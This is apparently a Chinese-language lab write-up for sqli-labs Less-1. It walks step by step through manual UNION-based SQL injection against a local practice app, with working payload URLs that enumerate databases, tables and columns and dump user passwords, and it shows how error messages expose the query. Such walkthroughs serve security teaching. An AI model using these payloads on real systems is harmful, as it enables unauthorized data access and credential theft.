天天看点

sqli-labs ---- Less-1 & Less-3 & Less-4mysql手工注入猜解查询语句

[地址]: https://github.com/Audi-1/sqli-labs

mysql手工注入

基于单引号的显错注入,在开始之前,复习一下mysql手动注入的知识。

访问地址http://127.0.0.1/sqli-labs/Less-1/?id=1',

提示"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1"。

sqli-labs ---- Less-1 & Less-3 & Less-4mysql手工注入猜解查询语句

UNION注入流程:

获取注入句型

http://127.0.0.1/sqli-labs/Less-1/?id=1'--+

猜解列数

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 5--+

Unknown column '5' in 'order clause'

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3--+

获取当前数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

获取数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+

获取表名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

获取列名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

获取数据

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

sqli-labs ---- Less-1 & Less-3 & Less-4mysql手工注入猜解查询语句

猜解查询语句

接下来讨论今天的主体内容。利用显错信息,猜解查询语句.

http://127.0.0.1/sqli-labs/Less-1/?id=\

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 0,1' at line 1

此处的\被不对称的单引号引用。\的作用是转义,主要用于判断输入是否被单个引号(单引号,或双引号)引用。上述结果证明输入被单引号包含。

http://127.0.0.1/sqli-labs/Less-1/?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

此处的1,被两个单引号引用。

http://127.0.0.1/sqli-labs/Less-1/?id=1'2

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' LIMIT 0,1' at line 1

此处的2,被一个单引号引用。

配合LIMIT 0,1' 处的错误信息,我们可以猜测查询语句的句型,大概是:

select * from table_name where id='$id' limit 0,1;

打开对应的源文件,信息如下:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

注: Less-3 与 Less-4 可采用同样的方法,故在此省略.

最后推荐大家看篇帖子: http://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string112